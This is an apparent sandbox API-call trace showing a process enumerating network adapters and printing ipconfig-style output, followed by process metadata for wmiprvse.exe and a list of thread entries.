	[0217.202] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x3c) returned 0x1662c0
	[0217.202] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n", cchWideChar=30, lpMultiByteStr=0x1662c0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nWindows IP Configuration\r\n\r\n", lpUsedDefaultChar=0x0) returned 30
	[0217.202] WriteFile (in: hFile=0x4e8, lpBuffer=0x1662c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xaf840, lpOverlapped=0x0 | out: lpBuffer=0x1662c0*, lpNumberOfBytesWritten=0xaf840*=0x1e, lpOverlapped=0x0) returned 1
	[0217.205] GetProcessHeap () returned 0x150000
	[0217.205] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1662c0 | out: hHeap=0x150000) returned 1
	[0217.205] LocalFree (hMem=0x1703f0) returned 0x0
	[0217.205] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0xaf890*=0x0 | out: AdapterAddresses=0x0, SizePointer=0xaf890*=0xd40) returned 0x6f
	[0217.957] LocalAlloc (uFlags=0x40, uBytes=0xd40) returned 0x1703f0
	[0217.957] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x1703f0, SizePointer=0xaf890*=0xd40 | out: AdapterAddresses=0x1703f0*(Alignment=0xe000001c0, Length=0x1c0, IfIndex=0xe, Next=0x170780, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x170670, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x170720, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x170750, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x1705b0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0xaf890*=0xd40) returned 0x0
	[0217.967] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2758, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="镐\x17") returned 0x2f
	[0217.967] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0217.967] GetFileType (hFile=0x4e8) returned 0x3
	[0217.967] GetProcessHeap () returned 0x150000
	[0217.967] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x5e) returned 0x17e5b0
	[0217.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nEthernet adapter Local Area Connection 2:\r\n\r\n", cchWideChar=47, lpMultiByteStr=0x17e5b0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nEthernet adapter Local Area Connection 2:\r\n\r\nÿÿÿÿÿ¾\x09\x05", lpUsedDefaultChar=0x0) returned 47
	[0217.967] WriteFile (in: hFile=0x4e8, lpBuffer=0x17e5b0*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x17e5b0*, lpNumberOfBytesWritten=0xaf3f0*=0x2f, lpOverlapped=0x0) returned 1
	[0217.969] GetProcessHeap () returned 0x150000
	[0217.969] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17e5b0 | out: hHeap=0x150000) returned 1
	[0217.969] LocalFree (hMem=0x179550) returned 0x0
	[0217.969] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="쵐\x17") returned 0x29
	[0217.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0217.969] GetFileType (hFile=0x4e8) returned 0x3
	[0217.969] GetProcessHeap () returned 0x150000
	[0217.969] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x52) returned 0x179470
	[0217.969] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x179470, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0217.969] WriteFile (in: hFile=0x4e8, lpBuffer=0x179470*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x179470*, lpNumberOfBytesWritten=0xaf3f0*=0x29, lpOverlapped=0x0) returned 1
	[0217.970] GetProcessHeap () returned 0x150000
	[0217.970] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x179470 | out: hHeap=0x150000) returned 1
	[0217.970] LocalFree (hMem=0x17cd50) returned 0x0
	[0217.970] RtlIpv6AddressToStringExW () returned 0x0
	[0217.970] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296a, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="쵐\x17") returned 0x45
	[0217.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0217.970] GetFileType (hFile=0x4e8) returned 0x3
	[0217.970] GetProcessHeap () returned 0x150000
	[0217.970] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8a) returned 0x179470
	[0217.970] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Link-local IPv6 Address . . . . . : fe80::e90b:3eb3:3aaa:6919%14\r\n", cchWideChar=69, lpMultiByteStr=0x179470, cbMultiByte=138, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Link-local IPv6 Address . . . . . : fe80::e90b:3eb3:3aaa:6919%14\r\n", lpUsedDefaultChar=0x0) returned 69
	[0217.970] WriteFile (in: hFile=0x4e8, lpBuffer=0x179470*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x179470*, lpNumberOfBytesWritten=0xaf3f0*=0x45, lpOverlapped=0x0) returned 1
	[0217.971] GetProcessHeap () returned 0x150000
	[0217.971] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x179470 | out: hHeap=0x150000) returned 1
	[0217.971] LocalFree (hMem=0x17cd50) returned 0x0
	[0217.971] RtlIpv4AddressToStringExW () returned 0x0
	[0217.971] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278a, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="쵐\x17") returned 0x36
	[0217.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0217.971] GetFileType (hFile=0x4e8) returned 0x3
	[0217.971] GetProcessHeap () returned 0x150000
	[0217.971] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x6c) returned 0x179470
	[0217.971] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   IPv4 Address. . . . . . . . . . . : 192.168.0.232\r\n", cchWideChar=54, lpMultiByteStr=0x179470, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   IPv4 Address. . . . . . . . . . . : 192.168.0.232\r\n:3aaa:6919%14\r\n", lpUsedDefaultChar=0x0) returned 54
	[0217.971] WriteFile (in: hFile=0x4e8, lpBuffer=0x179470*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x179470*, lpNumberOfBytesWritten=0xaf3f0*=0x36, lpOverlapped=0x0) returned 1
	[0217.972] GetProcessHeap () returned 0x150000
	[0217.972] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x179470 | out: hHeap=0x150000) returned 1
	[0217.972] LocalFree (hMem=0x17cd50) returned 0x0
	[0217.972] ConvertLengthToIpv4Mask (in: MaskLength=0x18, Mask=0xaf4b0 | out: Mask=0xaf4b0) returned 0x0
	[0217.972] inet_ntoa (in=0xffffff) returned="255.255.255.0"
	[0218.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x179728, cbMultiByte=-1, lpWideCharStr=0xaf4f0, cchWideChar=100 | out: lpWideCharStr="255.255.255.0") returned 14
	[0218.510] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278c, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="컐\x17") returned 0x36
	[0218.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0218.510] GetFileType (hFile=0x4e8) returned 0x3
	[0218.510] GetProcessHeap () returned 0x150000
	[0218.510] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x6c) returned 0x179470
	[0218.510] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", cchWideChar=54, lpMultiByteStr=0x179470, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", lpUsedDefaultChar=0x0) returned 54
	[0218.510] WriteFile (in: hFile=0x4e8, lpBuffer=0x179470*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x179470*, lpNumberOfBytesWritten=0xaf3f0*=0x36, lpOverlapped=0x0) returned 1
	[0218.515] GetProcessHeap () returned 0x150000
	[0218.515] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x179470 | out: hHeap=0x150000) returned 1
	[0218.515] LocalFree (hMem=0x17ced0) returned 0x0
	[0218.515] RtlIpv4AddressToStringExW () returned 0x0
	[0218.515] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278d, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="컐\x17") returned 0x34
	[0218.515] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0218.515] GetFileType (hFile=0x4e8) returned 0x3
	[0218.515] GetProcessHeap () returned 0x150000
	[0218.515] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x68) returned 0x17e5b0
	[0218.515] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Default Gateway . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=52, lpMultiByteStr=0x17e5b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Default Gateway . . . . . . . . . : 192.168.0.1\r\n¾\x09\x05", lpUsedDefaultChar=0x0) returned 52
	[0218.515] WriteFile (in: hFile=0x4e8, lpBuffer=0x17e5b0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x17e5b0*, lpNumberOfBytesWritten=0xaf3f0*=0x34, lpOverlapped=0x0) returned 1
	[0218.519] GetProcessHeap () returned 0x150000
	[0218.519] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17e5b0 | out: hHeap=0x150000) returned 1
	[0218.519] LocalFree (hMem=0x17ced0) returned 0x0
	[0218.519] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="镐\x17") returned 0x43
	[0218.519] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0218.519] GetFileType (hFile=0x4e8) returned 0x3
	[0218.519] GetProcessHeap () returned 0x150000
	[0218.519] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x86) returned 0x179470
	[0218.519] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter isatap.{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}:\r\n\r\n", cchWideChar=67, lpMultiByteStr=0x179470, cbMultiByte=134, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter isatap.{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}:\r\n\r\n", lpUsedDefaultChar=0x0) returned 67
	[0218.520] WriteFile (in: hFile=0x4e8, lpBuffer=0x179470*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x179470*, lpNumberOfBytesWritten=0xaf3f0*=0x43, lpOverlapped=0x0) returned 1
	[0218.525] GetProcessHeap () returned 0x150000
	[0218.525] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x179470 | out: hHeap=0x150000) returned 1
	[0218.525] LocalFree (hMem=0x179550) returned 0x0
	[0218.525] ConvertInterfaceIndexToLuid (in: InterfaceIndex=0xc, InterfaceLuid=0xaf4a8 | out: InterfaceLuid=0xaf4a8) returned 0x0
	[0218.525] NsiGetAllParameters () returned 0x0
	[0218.526] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2774, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="컐\x17") returned 0x3b
	[0218.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0218.526] GetFileType (hFile=0x4e8) returned 0x3
	[0218.526] GetProcessHeap () returned 0x150000
	[0218.526] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x76) returned 0x179470
	[0218.526] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=59, lpMultiByteStr=0x179470, cbMultiByte=118, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Media State . . . . . . . . . . . : Media disconnected\r\n0D}:\r\n\r\n", lpUsedDefaultChar=0x0) returned 59
	[0218.526] WriteFile (in: hFile=0x4e8, lpBuffer=0x179470*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x179470*, lpNumberOfBytesWritten=0xaf3f0*=0x3b, lpOverlapped=0x0) returned 1
	[0218.527] GetProcessHeap () returned 0x150000
	[0218.527] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x179470 | out: hHeap=0x150000) returned 1
	[0218.527] LocalFree (hMem=0x17ced0) returned 0x0
	[0218.527] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="컐\x17") returned 0x29
	[0218.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0218.527] GetFileType (hFile=0x4e8) returned 0x3
	[0218.527] GetProcessHeap () returned 0x150000
	[0218.527] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x52) returned 0x179690
	[0218.527] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x179690, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.527] WriteFile (in: hFile=0x4e8, lpBuffer=0x179690*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x179690*, lpNumberOfBytesWritten=0xaf3f0*=0x29, lpOverlapped=0x0) returned 1
	[0218.528] GetProcessHeap () returned 0x150000
	[0218.528] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x179690 | out: hHeap=0x150000) returned 1
	[0218.528] LocalFree (hMem=0x17ced0) returned 0x0
	[0218.528] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="镐\x17") returned 0x37
	[0218.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0218.529] GetFileType (hFile=0x4e8) returned 0x3
	[0218.529] GetProcessHeap () returned 0x150000
	[0218.529] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x6e) returned 0x181330
	[0218.529] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n", cchWideChar=55, lpMultiByteStr=0x181330, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n", lpUsedDefaultChar=0x0) returned 55
	[0218.529] WriteFile (in: hFile=0x4e8, lpBuffer=0x181330*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x181330*, lpNumberOfBytesWritten=0xaf3f0*=0x37, lpOverlapped=0x0) returned 1
	[0218.532] GetProcessHeap () returned 0x150000
	[0218.532] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x181330 | out: hHeap=0x150000) returned 1
	[0218.532] LocalFree (hMem=0x179550) returned 0x0
	[0218.532] ConvertInterfaceIndexToLuid (in: InterfaceIndex=0xd, InterfaceLuid=0xaf4a8 | out: InterfaceLuid=0xaf4a8) returned 0x0
	[0218.532] NsiGetAllParameters () returned 0x0
	[0218.532] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2774, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="컐\x17") returned 0x3b
	[0218.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0218.532] GetFileType (hFile=0x4e8) returned 0x3
	[0218.532] GetProcessHeap () returned 0x150000
	[0218.532] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x76) returned 0x181330
	[0218.532] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=59, lpMultiByteStr=0x181330, cbMultiByte=118, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", lpUsedDefaultChar=0x0) returned 59
	[0218.532] WriteFile (in: hFile=0x4e8, lpBuffer=0x181330*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x181330*, lpNumberOfBytesWritten=0xaf3f0*=0x3b, lpOverlapped=0x0) returned 1
	[0218.533] GetProcessHeap () returned 0x150000
	[0218.533] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x181330 | out: hHeap=0x150000) returned 1
	[0218.534] LocalFree (hMem=0x17ced0) returned 0x0
	[0218.534] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0xaf420, nSize=0x0, Arguments=0xaf428 | out: lpBuffer="컐\x17") returned 0x29
	[0218.534] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0218.534] GetFileType (hFile=0x4e8) returned 0x3
	[0218.534] GetProcessHeap () returned 0x150000
	[0218.534] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x52) returned 0x179690
	[0218.534] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x179690, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.534] WriteFile (in: hFile=0x4e8, lpBuffer=0x179690*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0xaf3f0, lpOverlapped=0x0 | out: lpBuffer=0x179690*, lpNumberOfBytesWritten=0xaf3f0*=0x29, lpOverlapped=0x0) returned 1
	[0218.535] GetProcessHeap () returned 0x150000
	[0218.535] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x179690 | out: hHeap=0x150000) returned 1
	[0218.535] LocalFree (hMem=0x17ced0) returned 0x0
	[0218.535] LocalFree (hMem=0x1703f0) returned 0x0
	[0218.535] CoUninitialize () 
	[0218.535] exit (_Code=0) 

Thread:
	id = 302
	os_tid = 0xc9c


Process:
	id = "23"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe"
	page_root = "0x17ca6000"
	os_pid = "0xd38"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "3"
	os_parent_pid = "0x250"
	cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Network Service"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0009c378" [0xc000000f]


Thread:
	id = 336
	os_tid = 0xd3c


Thread:
	id = 337
	os_tid = 0xd40


Thread:
	id = 338
	os_tid = 0xd44


Thread:
	id = 339
	os_tid = 0xd48


Thread:
	id = 340
	os_tid = 0xd4c


Thread:
	id = 341
	os_tid = 0xd50


Thread:
	id = 342
	os_tid = 0xd54


Thread:
	id = 343
	os_tid = 0xd58


Thread:
	id = 344
	os_tid = 0xd5c